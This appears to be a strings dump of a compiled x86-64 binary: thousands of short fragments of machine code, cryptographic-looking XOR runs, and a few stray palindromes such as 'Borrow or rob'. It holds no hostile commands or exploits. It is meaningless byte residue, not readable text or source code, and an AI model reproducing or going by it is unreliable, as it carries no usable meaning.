uwUH
s%f.
t.SH
t.SH
AVAUI
ATUI
A\A]A^
ATUSH
JPH!
[PI!
cPI!
[PH!
SPI!
KPI!
KPI!
[]A\
ATUSH
[]A\
[]A\
AWAVH
AUATI
t$(H
L$8H
H#l$
\$ H
oD$0H
oL$ H
L$(H
D$>H
t$0L
oT$ I
o\$0
|$(H
|$0f
T$>f
od$ H
\$(f
ol$0H
D$>A
u	fD
T$>D
t$>H
D$0I
o|$0L
|$8H
D$0	
ot$ H
\$(H
oD$0H
L$8fD
oL$ 
oT$0I!
H[]A\A]A^A_
t$>A
M#l$
vVI9m
AWAVH
AUATI
L$pL
4#fD
L$pL
[]A\A]A^A_
|$xH
L$`L
\$@L
)L$0
T$Pf
(L$0H
L$xH
|$ L
H9|$
H9T$ rdI
L$`L
)L$0L
\$@f
(L$0L
T$PH
L$`L
)L$0L
D$ L
D$ L
T$Pf
(L$0H
\$xH
H9|$ 
l$pL
\$PD
d$ L
T$0H
D$xH
d$ f
T$0D
L$@L
t$xH
L$`H
L$`L
\$@L
D$ H
)L$0
T$Pf
(L$0H
|$xA
L$PL
)L$ L
D$xH
T$@f
(L$ H
|$xI
|$`H
)L$ L
L$pL
(L$ 
\$`L
D$@L
)L$PH
L$0L
\$`I
(L$PH
D$ H
\$xL
D$PL
)L$`H
t$0L
\$xL
D$Pf
(L$`I
L$@H
t$0L
\$pL
\$PL
)L$ H
D$pH
(L$ L
T$@L
\$pL
\$pI
\$PL
d$0H
)L$ 
T$@L
d$0f
(L$ I
\$`L
D$@L
)L$PH
T$xH
\$`f
(L$PI
D$@L
L$0H
H;0vfI9j
\$pL
\$pH
\$`L
)L$PH
|$ H
t$0L
D$@I
(L$PH
\$pL
\$pI
)L$ L
L$pL
(L$ I
\$xD
L$`L
d$@H
)L$0H
T$PL
\$xD
d$@f
(L$0I
T$ H
L$xL
\$PL
D$0H
)L$@H
T$`H
\$PL
D$0f
(L$@I
\$`L
)L$PH
T$xH
\$`f
(L$PI
D$@H
t$0H
)L$ L
(L$ D
L$pI
\$pL
\$pI
AWAVAUATI
L$(A9
oD$ M!
|$(A9
D$ 	
oT$ M!
8[]A\A]A^A_
veM9w
H;8v\M9n
AWAVH
AUATUSH
L$8H
L#\$
oD$0I
l$ H
oL$ f
T$(H
oT$ f
L$>H
o\$0Lc
D$>f
od$ f
t$(H
ol$0H
|$>f
ot$ A
l$0L
D$(f
o|$0H
l$8A
oD$0H!
oL$ H
T$(L
\$8D
oT$0H!
o\$ H
L$(L
T$8E9
<3M!
od$0M!
ol$ I
T$8G
ot$0L!
T$8A9
oD$0L!
oL$ I
|$(f
L$>9
D$ 	
oT$ I!
o\$0H
T$(A
+Mci4M
od$ M!
l$0A
ol$0H
H[]A\A]A^A_
M9L$
I9|$
M9T$
I9|$
M9\$
M9L$
M9\$
vVM9l$
vaM9t$
vVM9l$
H;8vWM9l$
v`M9t$
H;8vaM9t$
vWM9l$
AWAVI
AUATH
D$HH
L$hH
H;0H
L#t$HH
\$pH
oD$`H
\$hI	
oL$pH
t$HH
D$~A
u	fD
d$~D
|$~H
D$pH
oT$`H
T$hf
o\$pH
|$~H
D$pI
od$`L
ol$pA
\$hH
L$pH
L$~I
ot$`L
|$hf
o|$pH
|$~H
D$pI
oD$`E1
l$X1
oL$pI
\$~A
t$~E9
l$pI
oT$pH
D$~A
T$ L
|$(A
d$TH
T$xL
o\$p
t$xL
d$hH
D$p	
ol$pH
\$xfD
od$PfD
ot$`E
o|$pM!
|$@f
oD$@H
[]A\A]A^A_
T$ L
L$8L
D$0H
L$(H
t$8I
D$0H
l$~A
T$8L
L$0H
L$(L
D$ H
L$0H
L$(L
D$ H
T$(L
L$ H
T$(H
oa A
oi0A
oq@A
oyPA
zPfD
oA`E
B`fD
oIpE
JpfD
R	t?D
t$@H
)D$ H
D$} 
T$(H
L$0H
|$ H
|$XH
|$ H
t^H)
D$ H
D$0H
|$ f
AWAV1
AUAT1
D$8L
L$(M
H#L$8H
oD$ 
L$8H!
t$0I
t$@D
D$4I
|$(E9
L$8I
T$4I
d$0L
L$8I
t$8H
D$ 	
oT$ M!
t$0C
d$0H
t$0H
t$0H
t$0H
t$0H
l$HI
t-H9}
[]A\A]A^A_
L$8D
d$0E1
L#t$8I	
v^M9n
d$0H
l$0I
D$ I
d$0I
AUATH9
[]A\A]
	@.I
$@.I
[]A\A]
$@.I
$@.I
AWAVAUATUSH
wuM9
[]A\A]A^A_
u?I9
4$I9
ATUSH
S H)
,&H9
[]A\
AVAUATUSH
o H;o
t$ H
D$ L
[]A\A]A^
t$ H
uzH9
S H+S
[]A\A]A^
t$ L
\$ H
S H+S
L$ I
D$ H
D$ H
D$ H
D$ L
D$ L
D$ H
D$ I
D$ H
AWAVAUATI
I;G 
uYH9
S H+S
L;] 
< I9
h[]A\A]A^A_
h[]A\A]A^A_
I;G 
K H;K
]A\A]A^A_
>I#n
<,H9
\tNL
(H#P
{ tbL
[ L+[
L$ I
4/H9
o!fD
o] H
[]A\A]A^A_
o4$L
L$ fE
ot$ I
L$0M
ot$0f
S H+S
)\$ H
o\$ H
S H+S
)\$ L
7H#o
D$@D
\$0N
T$ H
)\$PI9
D$@D
\$0H
T$ H
o\$PI
)\$ 
o\$ L
T$ I
$@.I
<	E)
$@.I
o\$ 
v&=?B
w M)
W M)
<?Dk
D$ H
)\$0I9
D$ H
o\$0I
D$@H
T$0L
)\$PM9
D$@H
T$0H
L$ f
o\$PH
r3Lc
v	Lc
4$Hc
$@.I
D$ H
)\$0I9
D$ H
o\$0I
D$ H
)\$0I9
D$ H
o\$0I
$@.I
t$ H
)\$0M9
t$ H
o\$0I
D$ H
)\$0I9
D$ H
o\$0I
L$ H
T$0L
D$@f
o\$P
T$ H
)\$0I9
T$ H
o\$0I
D$ H
)\$0I9
D$ H
o\$0I
L$ H
)\$0M9
L$ H
o\$0I
D$ f
o\$0
D$ f
o\$0
D$ f
o\$0
T$ D
\$0L
D$@f
o\$P
D$ I
t$ D
D$ H
)\$ 
o\$ I
T$ f
o\$0
0sPA
D$@D
)\$PH
T$ H
D$@D
\$0H
T$ H
o\$PI
t$ f
o\$0
L$ f
o\$0
D$ f
o\$0
D$ f
o\$0
<40H
<40L
<40H
<40L
<40H
<40L
D$ H
)\$0
D$ H
o\$0I
L$(I
D$ H
)\$0
D$ H
o\$0I
D$ H
)\$0
D$ H
o\$0I
D$0H
)\$@H
D$0H
T$ f
o\$@H
D$ H
)\$0
D$ H
o\$0I
D$ H
)\$0
D$ H
o\$0I
t$ H
)\$0
t$ H
o\$0H
L$ H
)\$0
L$ H
o\$0I
T$ H
)\$0
T$ H
o\$0H
ATUSH
[]A\
t0L9
[]A\
AWAVAUATUSH
slH9
w8H9
t$(I
_AXL
AYAZ
A]A_M
t$ H
A[A\I
AYAZ
([]A\A]A^A_
_AXL
t$(H
<$L)
t$(H
<$I)
t$(L
AWAVAUATI
([]A\A]A^A_
AWAVI
AUATI
[]A\A]A^A_
AUATI
$WfD9
	[]A\A]
AVAUATI)
r>fD9
s)fA
_AXH
<$fD;;r
[]A\A]A^A_
sAQD
/fA9
[]A\A]A^A_
AUATI
[]A\A]
[]A\A]
Htb@
Ptl@
pt"@
rtT@
ATUI
 []A\
AWAVI
AUATI
[]A\A]A^A_
AUAT
[]A\A]
[]A\A]
[]A\A]
AUATI
L$$RH
ATPL
D$@H
T$PD
L$LE
X[]A\A]
X[]A\A]
X[]A\A]
o	SH
AVAUI
ATUH
t$ H
T$4H
t$4V
D$PH
L$L1
p[]A\A]A^
AVAUI
ATUI
`[]A\A]A^
t$ H
T$4H
D$@H
T$PD
L$LE
`[]A\A]A^
`[]A\A]A^
AVAUATUSH
L$HL
D$PL
L$Xt:
)D$`
)L$p
L$0H
\$(L
T$(L
D$(L
L$(L
T$(L
o4$L
[]A\A]A^
AUATUSH
T$@H
L$HL
D$PL
L$Xt:
)D$`
)L$p
T$0H
\$(L
t$(H
T$(L
D$(L
o$$H
T$(H
o,$H
D$(L
o4$H
t$(H
[]A\A]
AUATUSH
]8H9
[]A\A]
[]A\A]
t=Hc
t(Hc
t"Hc
ATU1
[]A\
AWAVAUATI
L#L$(H-
D$ I
L$ H
[]A\A]A^A_
4$I#w
H#T$(H
l$ I
D$ I
H#T$(I
T$ I
L$ I
<$D)
4$H#w
4$I#w
4$I#w
4$H#w
O A9
w`M9
4$I#v
4$I#w
4$I#v
_@A9
4$I#v
4$I#w
k`I9
4$H#u
4$I#s
4$I#v
C A9
4$H#u
4$H#u
4$I#w
4$I#v
4$H#u
oT$0f
o\$@M
od$Pf
ol$`f
ot$pf
4$I#v
4$H#u
ATUS
[]A\
]A\1
ATUSH
t	[]A\
]A\1
ATUS
[]A\
]A\1
tYSH
AWAV
AUATI
L#L$(H-SNI
D$ I
L$ H
q`M9
[]A\A]A^A_
4$I#v
L#L$(I
\$ H
|$ H
8[]A\A]A^A_
4$H#q
Q D9
4$I#v
Q@D9
4$I#v
q`M9
j`I9
4$I#v
4$I#v
4$I#v
AUATI
[]A\A]
[]A\A]
AUATI
]A\A]
AWAVAUATUSH
H[]A\A]A^A_
L#T$8I
D$0I
D$0I
T$ H
H#T$8H
\$0H
L$0M
H[]A\A]A^A_
x`M9
)L#a
T$0H
D$ H
T$(H
D$ H
T$(H
\$`I9
I#t$
T$ D9
H[]A\A]A^A_
T$ H
D$ H
T$(H
T$@D9
T$ H
I#t$
T$ H
AWAVAUATI
H[]A\A]A^A_
L9` }
L9c 
H[]A\A]A^A_
L#T$8I
L$0H
L$0M!
h`I9
L9b }
L9e 
L$ L
L$ L
L$ L
L$ L
L$ L
L$ L
L$0H
H#D$8I
D$0H
T$0H
s`M9
ATUH
[]A\
AUATUSH
[]A\A]
AVAUATUSH
H;t$ 
H9t$
0[]A\A]A^
0[]A\A]A^
AWAVAUATUSH
L$8H
\$hM
oD$0H
oL$`
|$8H
oT$`M!
o\$0H
T$8D9
od$`H!
ol$0I
L$8L
l$hI
H#|$
ot$`I
o|$0
|$hH
L$8fD
oD$`D
oL$0D
l$8L
t$hfD
oT$`D
o\$0D
od$`I!
D$0H
t$`fD
D$`H
L$HH
|$@I
t.H9}
[]A\A]A^A_
I9T$
I9|$
I9|$
L$PH
D$HH
t$@L
t$ H
D$@L
D$PH
v\M9l$
v[M9l$
v\M9l$
D$ I
|$HfE
)t$0
ATUH
[]A\
[]A\
[]A\
AWAVAUATUSH
t$PL
|$0H
H9N }
H;K 
oD$ 
oL$0
L$@L
t$ H
[]A\A]A^A_
B L9C @
AWAVAUATI
l$ H
l$0H
D$@H
l$ D
T$ D
l$ D
 wbL
 w;L
T$ D
\$pE
t$ H
\$pE
T$ E
T$ D
l$ D
T$ D
d$ E
 wdL
< w@H
T$ D
T$P1
T$XL
|$PH
[]A\A]A^A_
H#L$HI
L$@I
t$@H
H#L$HA
T$@M
d$@H
L$HI
L#L$HI
t$@L
L$HI
L$@M!
j`I9
o*fD
o*fA
{`M9
L#d$HI
l$@I
L$@M
L$ A
a`M9
L#l$HI
|$@I
T$@D)
j`M9
L#|$HI
d$@I
|$@I
j`I9
4$I#w
d$xL
D$PD
D$XL
b`M9
H+T$0L
|$XH
T$xH
H+T$0H
t$XH
T$xH
4$I#s
C E9
4$I#w
K@E9
4$I#w
4$I#t$
4$I#q
4$H#r
R E9
4$I#t$
J E9
z D9
A E9
4$I#t$
J D9
Z@E9
I@D9
4$I#t$
R@E9
B@E9
z@D9
4$I#t$
4$I#w
H+T$0
T$xH
<$D9
4$I#t$
4$I#t$
4$I#t$
4$I#w
4$H#u
4$I#t$
4$I#t$
4$H#u
4$H#u
H+l$0
AWAVAUATUSH
[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
AWAVAUATUSH
|$ H
|$(L
8[]A\A]A^A_
AWAVI
AUATI
[]A\A]A^A_
AWAVI
AUATUSH
M;W 
h[]A\A]A^A_
h[]A\A]A^A_
I;G 
6I#V
t$Pf
{ L;{
)l$ H
ol$ 
D$PH
(H#P
N fA
ov H
4$I#l$
]A\A]A^A_
[]A\A]A^A_
o1fD
O fE
oW I
ow0fD
o4$A
>I#n
)l$0
)d$ 
ol$0f
od$ f
M;F 
$@.I
od$ f
ol$0
v&=?B
W M)
w H)
D$_L
)l$@I9
)d$0
)\$ 
D$_H
ol$@f
od$0f
o\$ H
)l$@I9
)d$0
)\$ 
ol$@f
od$0f
o\$ H
$@.I
r/Lc
v	Lc
4$Lc
o\$ f
od$0f
ol$@
o\$ D
D$_f
od$0f
ol$@
)l$ 
ol$ f
t$ D
0sPA
<$I)
<$I)
<40H
<40L
<40H
<40L
<40H
<40L
0ujI
0u[A
)l$ 
ol$ f
)l$ 
D$0f
ol$ f
AWAVL
AUATI
*L;n }^L
L;h H
[]A\A]A^A_
W H9
L;h 
2M9s 
K H9
[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
M M9
[]A\A]A^A_
I9\$
K I9
I9\$
ATUSH
[]A\
ATUH
U H)
[]A\
AWAVI
AUATI
"t)D
\tND
M8I)
U8t'H
([]A\A]A^A_
`	tsD
L;L$
L;L$
ssfE
L;L$
L+L$
([]A\A]A^A_
AUAT
([]A\A]
vsL9a
([]A\A]
AUAT
([]A\A]
vsL9a
([]A\A]
7xHH
AWAVI
AUATI
	w<I
u?fE
t0fE
t$8I
L$@H
D$8t
 wgL
 wAL
\$8A
([]A\A]A^A_
T$8M
l$@L
D$8t
([]A\A]A^A_
D$8M
L$@M
\$8t
[]A\A]A^A_
T$8I
t$@H
|$8t
 wfL
 w@L
\$8I
([]A\A]A^A_
t$8M
L$@L
uQf.
([]A\A]A^A_
D$8I
T$@D
t	fD
t$8t
|$0H
D$0L
D$@H
|$0H
D$0L
D$@H
 wfI
 w?M
< w`I
 w;I
 wiM
 wDI
 w!I
 wlM
 wEM
 w"I
t$8A
t=ZZ
o5tY
o(fD
 wjI
 wCM
< w"I
 w[I
sUL)
 w:I
 w^I
 w9I
 w^M
sXL)
 w;M
 wbM
 w<I
 w\I
sVL)
 w;I
\$8I
\$8A
|$0H
D$0L
D$@M
|$0H
D$0H
D$@L
|$0H
D$0H
D$@L
D$8@
T$@I
D$ tSE
o:fA
t=dL
t5KL
o:fA
t=(L
t='L
o*fA
o*fE
t5oK
t=vK
t-{K
o-oJ
o%iJ
|$0H
|$0H
|$@H
\$8I
\$8A
 weM
 w@I
 wvM
 waI
< wNI
 w9M
 w$M
t$8A
o:fD
o:fA
T$HI
|$0I
t$8L
|$0I
D$ I
D$(I
D$8L
|$0I
D$ I
D$(I
D$8L
D$8L
o*fE
t5W?
t=>?
o*fE
t5 ?
t='?
t-4?
|$0I
D$ I
D$(I
|$0I
D$ I
D$(M
t%Z>
t%D>
|$0I
D$ I
D$(I
o	fA
o	fA
D$ I
D$(L
/uHH
tKUSH
	v3E
	vhA
	v$A
v|E1
ATUE1
[]A\
	v)A
	v/E
[]A\
[]A\
	v E
<	v+
<	v,
	v!A
<	v/D
<	v5E
<	v+E
	v E
WhH3F`H3VhH	
GxH3NpL3FxI	
toATUL
]A\H
ATUH
XZ[]A\
ATUI
[]A\
[]A\
toATUL
]A\H
ATUI
[]A\
[]A\
ATUH
XZ[]A\
AVAUATUH
[]A\A]A^
{ [H
HcS H
R HcS$H
AUATI
iA4`
G +q4
)D$ 
)D$0i
|$PH
EiQH
HcS$L
[]A\A]
HcW$1
P HcS$H
W H9W(t&1
E(H)
AUATUSH
g(L9
[]A\A]
tkATUA
D;aD|
[]A\
C(Hc
[]A\H
AUATI
x,D9m
[]A\A]A
[]A\A]
K [L
tkATUA
D;aD|
[]A\
C Hc
[]A\H
AUATI
x/D9m
[]A\A]A
[]A\A]
AVAUI
ATUI
o(H+o 
H;s0
[]A\A]A^
[]A\A]A^
AWAV
AUATUSH
|$(DiFH
u(H;u0D
L9d$
L$(iBH
H;u0
L$(EiZH
H;u0E
T$(M
L9d$
8[]A\A]A^A_
T$(H
AWAVI
AUATI
[]A\A]A^A_
AUATI
[]A\A]
H+C H
AUAT
[]A\A]
[]A\A]
AUATA
[]A\A]
AUATI
D$ H
[]A\A]
]A\A]
[]A\A]
AUATI
[]A\A]
t+USH
t+USH
N ATUSH
[]A\
HcG(H
t ~.
AVAUATUI
|$ H
H;D$
D$(H
T$ H
D$@H
H9T$
|$(H
|$0H
H;D$
D$(L
T$ L
H;T$
|$(H
|$0H
H;D$
D$(L
T$ L
L$pE
|$@H
L$pE
T$ I
H9T$
H9T$
\$(L
H;D$
D$(H
T$ H
H9|$
t$(L
H;D$
D$(H
T$ H
H9T$
H9T$
D$(H
H;D$
D$(L
T$ L
L$pE
T$PE1
T$XL
|$PH
[]A\A]A^
[]A\A]A^
[]A\A]A^
H9T$
t$(L
H;D$
D$(H
T$ H
H9T$
|$(H
|$0H
H;D$
D$(H
T$ H
\$xH
L$PD
L$XL
T$(H
T$0H
H;D$
D$(H
|$ H
H+T$
l$0L
T$XL
l$xL
H9T$
L$(L
H;D$
D$(L
T$ L
H+T$
T$PH
t$xH
L$(H
L$0H
H;D$
D$(H
|$ H
L$(L
H;D$
D$(L
T$ L
T$ M
T$(H
T$0H
H;D$
D$(L
T$ L
L+l$
l$0L
l$xL
\$(L
H;D$
D$(L
T$ L
T$ L
L+l$
l$0L
D$(L
H;D$
D$(L
T$ L
H9|$
T$ D
H9T$
T$ D
AWAV1
AUAT
T$0H
T$0L
T$0H
T$0H
T$0H
T$0H
T$0H
T$0H
T$0H
T$0H
d$0L
l$8H
H#T$(H-{MI
D$ I
D$ H
d$0H
H#L$8I
j`M9
B@A9
L#T$(I
L$ I
|$ L
x`M9
l$HH
t,H9}
[]A\A]A^A_
l$HH
ATUI
[]A\
[]A\
_`M)
u`H;uh
AWAVAUATUSH
\$ H
L#D$HH
T$@I	
|$0)
|$@D
4$I#w
l$0D
X[]A\A]A^A_
\$(L
M`L9
4$I#q
L$8t
+\$ H
L#l$H
\$@H
l$HI
U@D9
4$I#r
M`L9
4$I#v
~`L9
X[]A\A]A^A_
Q D9
4$I#u
U D9
4$I#q
4$I#w
4$I#w
4$I#w
|$0H
X[]A\A]A^A_
4$I#w
4$I#q
4$I#q
4$I#w
|$0H
X[]A\A]A^A_
D$01
t$0A
4$I#w
L$0D
\$0I
|$0D
d$0M
L$`M
D$01
AWAVL
XAUATA
u`H;uhH
[]A\A]A^A_
[]A\A]A^A_
}`I9
[]A\A]A^A_
[]A\A]A^A_
[]A\A]A^A_
vti=
E`H)
u`H;uh
9EL~
ATUI
[]A\
G H;G
AWAVI
AUATI
[]A\A]A^A_
AUATI
L$8H
[]A\A]
ubI9
AWAVAUATI
H[]A\A]A^A_
D$ H
t$(s
H[]A\A]A^A_
t$(L
	wKM9
wFH9S
	wbA
T$(L
D$ H
D$ D
T$(D
L$0L
D$ H
L$0D
D$ D
T$(D
L$0H
L$?H
L$0D
T$(L
\$ D
L$?L
L$0s
H[]A\A]A^A_
H[]A\A]A^A_
D$ H
D$ L
D$(H
D$(L
D$0H
L$?D
D$(D
T$ D
D$0L
D$(D
T$ L
D$(H
D$(D
D$ H
D$(D
L$0L
\$0H
T$(L
\$0L
H[]A\A]A^A_
D$(D
T$ L
D$(L
u@E1
D$ L
t;L9
[]A\A]A^A_H
t}H)
AWAVI
AUATI
n H;n
\tyA
8tDA
([]A\A]A^A_
([]A\A]A^A_
([]A\A]A^A_
viI9]
I;u 
} E	
I;U 
I;} 
M;E 
M;U 
I;E 
AWAVAUATI
~8<t
[]A\A]A^A_
L$8M
D$@I
|$8t
[]A\A]A^A_
[]A\A]A^A_
D$8M
\$@I
L$8t
\$8A
[]A\A]A^A_
\$8A
[]A\A]A^A_
T$8M
t$@L
\$8M
T$@I
\$8M
t$@I
|$0H
D$0L
D$@I
|$0H
D$0L
D$@I
t$8D
[]A\A]A^A_
\$8E
\$8A
|$0H
D$0L
Do nine men interpret Nine men I nod
D$@I
|$0H
D$0H
D$@L
|$0H
D$0H
D$@I
\$8E
\$8A
vhL9}
t$8D
|$0I
D$ I
D$(M
|$0I
D$ I
D$(I
|$0I
D$ I
D$(M
|$0I
D$ I
D$(M
|$0I
D$ I
D$(M
config.j
@	son
AUATE1
=X6(
=#6(
-}5(
-^5(
EXL;E`tzI
U`L)
E`L)
([]A\A]
=:4(
([]A\A]
~hI3A`I3yhH	
VxM3ApM3QxM	
oT$ A
o\$0A
od$@A
ol$PA
ot$`A
o|$pA
xpfD
L$XE
T$hL
\$`L3VhL3^`M	
D$pH
L$xH3FpH3NxH	
L9SP
L9Sp
=70(
H9{0
H9{0
o@pD
T$HD
T$4D
\$LD
ok8D
|$DH
AUATUHc
-"*(
[]A\A]A^
[]A\A]A^
AWAVAUATUSH
[]A\A]A^A_
[]A\A]A^A_
AVAUATUSH
T%Fd
/%Nd
/%Ld
0[]A\A]A^
AVAUATUI
]A\A]A^
[]A\A]A^
AVAUATUSH
-b!(
0[]A\A]A^
NhH3
NxL3
t$`H
|$hH3
D$pL
L$xL3
o\$PL
od$`fD
ol$p
o4$f
oD$ fD
oL$0fD
oT$@
ocPL
H9{0
H9{0
oOPH
AUATUSH
[]A\A]
[]A\A]
)|$0
oC D
)D$@
oK0D
)L$P
oS@D
)T$`
o[PD
)\$p
oc`D
t$0A
)S f
)[0f
)c@f
)kPf
)s`f
){pfD
oS H
AVAUA
ATUI
[]A\A]A^
AWAVI
AUATI
[]A\A]A^A_
toE1
Y%QB
AWAVAUATUSH
l$`L
H3L$
H3L$
H3L$
L3L$
H3L$
L3|$
L3|$
L3d$
L3|$
L3$$L3D$
L3d$
L3D$
T$(L
\$HM
D$8H
|$@H
l$PI1
|$ H
L$XL
H3D$
H3t$
H3L$
H3T$
l$ I
|$(H
|$(L
H#l$
|$HL!
t$PI!
T$XM1
L$8L
d$@H1
\$0H
H#T$ H
\$0H1
l$`L
h[]A\A]A^A_
AWAVI
AUAT1
oS M
o{pf
o[0f
oc@f
okPf
os`f
l$ L
T$XL
t$8H
\$HL
L$(L
t$pH
\$hL
l$xH
D$PH
T$`H
t$0H
L$@L
L$xH3t$HL
H3t$PH
H3t$XI1
\$(H3t$`L3\$hM1
L3|$0L1
L3\$pL3|$@H3L$ L
t$HH3L$8H
\$(H1
T$0M1
\$pH1
d$HI
t$xM
\$@H
\$@H
L$8M1
|$`H
L$`I
\$XI
T$8H1
T$PH
H3|$ H
H3t$hI
H3T$
d$(M
l$HI
d$HM
d$hL
D$ I
\$PH
l$pL
t$@H
\$8L
T$0M!
|$xL
t$8M!
\$`M1
\$`H
L$@L
T$XL
~L$(L
~\$HH
~l$ D
~t$pD
~|$0D
~D$XD
l$PD
t$xD
|$8L
[]A\A]A^A_
AWAVAUATUSH
|$XH
H3L$
H3L$
H3L$
H3D$
H3L$
L3t$
H3D$
H3l$
L3L$
H3,$L3L$
H3l$
T$0L
D$8M
D$@L
\$HM1
d$ I1
H3D$
\$PM
H3t$
H3L$
H3|$
d$ I
L#d$
l$8I
L$PI
|$@I1
l$HH
L$0I
t$(H
H#|$ I36I
t$(H1
L;t$X
D$`L
h[]A\A]A^A_
AWAVAUATUSH
oU f
o]0f
oe@f
omPf
ou`f
o}pf
L$8H
D$PH
l$ L
L$HL
D$0L
d$`L
t$@L
\$(H
t$pL
T$xH
t$hH
L$XH
\$pL3\$xL3
L$(L3
H3L$0H3L$8L
H3L$@L
H3L$HL
|$PL
L3|$XI1
L3L$
L3|$`H1
L3L$ M1
L3|$hM1
D$0L1
|$`H1
D$ I
|$PH
T$xH
|$pL1
t$HI
L$ L
T$HL
\$8L
t$@I1
H3T$(H3t$
\$hI!
T$(L
H3L$XI
T$PM
|$pL
L#T$
l$0L
D$XL
t$xH
|$8L
t$`H!
D$ L
L$ L
\$HM!
l$hL
M3>I
L$HL
~D$x
~l$P
~|$0D
~T$`D
~d$@
[]A\A]A^A_
AUATUS
,$1W8D
D1O0A
1o D1G(D
O-E	
O5A1
O=A1
n<]A\A]A^A_
D1G$
D1O,1G
W0D1W4D
O%A1
O-D	
O>D	
O5A1
O=D	
n<]A\A]A^A_
AWAV
@AUAT
)\$ 
)T$0
)L$@f
)D$P
t$`H
|$ 1
t$ H
t$ D
|$$3t$`D3|$dD
L$(D
t$,D3L$hD3t$l
L$03L$p33D3{
l$4D
D$8D3l$tD
d$<D3D$xD3d$|D3k
T$LD
T$P3
3S,D3S03
|$HD3
T$TD
T$X3
3S4D3S83C D3[$3{(
T$\D3
D3S<
@H;l$
[]A\A]A^A_
AWAVAUATI
~:Hc
t$@H
)d$ 
)l$0
t$@H
t$@H
t$@H
t$@H
|$@H
t$0f
[]A\A]A^A_
XHA)
t^Mc
t/Mc
)M t
AWAVH
AUATUSfE
|$ D
j?$fD
oF0A
)d$xD
)L$8
)T$H
X<fD
)d$hD
)\$X
D$8D
j?$D
d$LD
|$TD
Lcl$
Lcl$
xLcl$
Hc\$
LcD$
Lct$
Hc|$
LcD$
t$ f
)l$8fE
l$<fE
\$@D1>D1n
)t$HD
)T$XD
)\$hD
\$DD1v
T$PD1F
l$\D1f
D$`I
|$d1N
T$lD
|$p1F
\$,D1.1^
L$0D1v
t$4A1I
[]A\A]A^A_
AWAVAUATI
[]A\A]A^A_
O@Mc
[]A\A]A^A_
AWAVAUATI
[]A\A]A^A_
O@Mc
[]A\A]A^A_
C0Hc
AWAV1
AUATUSH
[]A\A]A^A_
AWAV1
AUATUSH
[]A\A]A^A_
AWAVAUATI
)L$ 
)T$0
t$@L
L$DE1
T$@L
L$@A
D$ D
L$$D
[]A\A]A^A_
L$DA
t$@H
AWAVAUATI
)L$ 
)T$0
t$@L
L$DE1
T$@L
L$@A
D$ D
L$$D
[]A\A]A^A_
L$DA
t$@H
AWAVAUATI
l$@f
t$ fD
)D$@D
)D$PD
)D$`D
)D$p
L$@H
)L$@tEH
T$PD
)T$Pt,H
o] fD
\$`D
)\$`u
oe0fD
d$pD
)d$pI
F0L4@L9
D0\<@L9
B0L<@H9
D0\<@L9
L5	B0L<@H9
D0\<@L9
F0t<@
o,$A
)L$@
)L$P
)L$`
)L$p
T$@H
)T$@t<H
)|$Pt&H
om f
)l$`u
oE0f
)D$pI
D0|4@L9
F0d4@H9
D0|4@L9
	F0d4@H9
D0|4@L9
B0l4@L
[]A\A]A^A_
l$@f
)|$@
)l$P
)D$`
l$@H
srE1
AVAUATUI
)t$@
)t$P
)t$`
)t$p
|$@H
)|$@tEH
D$PD
)D$Pt,H
oM fD
L$`D
)L$`u
oU0fD
T$pD
)T$pI
F0L,@L9
D0\<@L9
B0L4@H9
D0\<@L9
L-	B0L4@H9
D0\<@L9
F0l4@
t$@L
)t$@D
)t$PD
)t$`D
)t$p
|$@H
)|$@t<H
)D$Pt&H
oM f
)L$`u
oU0f
)T$pI
D0t4@L9
F0d,@H9
D0t4@L9
	F0d,@H9
D0t4@L9
B0l,@H
[]A\A]A^
)D$@
)L$P
)T$`
|$@H
|$@H
|$@H
|$@H
|$@H
|$@H
|$@H
|$@H
|$@L
|$@I
t$ H
snE1
AWAVAUATI
[]A\A]A^A_
O@Mc
[]A\A]A^A_
AWAVAUATI
[]A\A]A^A_
O@Mc
[]A\A]A^A_
AWAV1
AUATUSH
|$ @
t$!A
\$$A
T$%@
|$(D
D$)D
d$0L
l$6L
L$7D
L$,D
T$-D
l$1D
|$5@
t$8D
\$9D
D$;D
T$<@
l$ E
H[]A\A]A^A_
41M)
l$ L
L$ E
AWAV1
AUATUSH
|$ @
t$!A
\$$A
T$%@
|$(D
D$)D
d$0L
l$6L
L$7D
L$,D
T$-D
l$1D
|$5@
t$8D
\$9D
D$;D
alula
T$<@
l$ E
H[]A\A]A^A_
41M)
l$ L
L$ E
AWAVI
AUATI
L$ L
l$pf
)D$p
|$PH
|$pH
)|$ptQH
o^ f
oN0f
0L<pH9
	B0|
0L<pI9
D$0f
)t$p
)|$ptWH
oN fD
oV0fD
	B0|
T$(H
t$ H
d$RA
\$P@
D$SD
T$T@
\$wA
D$pD
\$t@
t$uD
Borrow or rob
T$xA
|$yA
L$|D
t$}D
\$SA
D$PD
\$TD
t$MH
D$	E
[]A\A]A^A_
l$pL
)t$pD
t$LH
t$NA
)L$0H
ot$0
)|$p
\$pE
AWAVI
AUATI
t$`H
oy fD
oY0f
\$HL
)L$0
)T$ 
oT$ I
oL$0
o{ f
oC0fD
l$bA
D$`@
L$c@
t$bA
T$`D
T$cD
t$dD
[]A\A]A^A_
o@L;l$
t$\H
t$^A
)L$ H
D$`f
o4$H
ol$ 
AWAVI
AUATUSH
L3t$
H3l$
UUUUUUUUM!
L3|$
H3l$
H3D$
H3T$
sHI1
UUUUUUUUM
$	H	
L3t$
B0I!
L3d$
H3L$
L3L$
H3D$
33333333I!
s L!
H3l$
H3\$
H3D$
H3L$
H3|$
33333333H!
k(I	
cXH	
L3t$
APM!
L3d$
H3l$
H3L$
H3D$
s M	
K0L!
sPH	
H3l$
H3\$
H3L$
H3t$
H3D$
sxL	
L3t$
@pL!
L3T$
L3D$
H3L$
H3D$
H3l$
L3l$
L3L$
H3|$
H3D$
k(I1
{8H	
L3t$
L3|$
L3L$
H3t$
H3D$
C0I!
[@L	
L3L$
L3l$
L3d$
H3D$
L3t$
L3L$
H3L$
L3l$
H3|$
c@I1
L3t$
L3l$
L3t$
H3D$
L3D$
L3t$
L3l$
H3D$
L3D$
L3L$
L3|$
L3t$
H3t$
L3L$
[]A\A]A^A_
AVAUAT$
)D$0D
)L$@D
)T$PD
)\$`D
)d$pD
H1|$0H
H1t$@fI
L1D$P
L1T$8L
L1\$HH
L1L$`H1D$X
H1L$h
ol$pM9
)t$pD
H1|$XH
H1D$0H1L$8H1l$@L1l$HL1D$PL1L$`L1t$h
H1t$pL1d$xM
H1|$@H
H1L$0L1D$8L
L1L$HL1t$PH
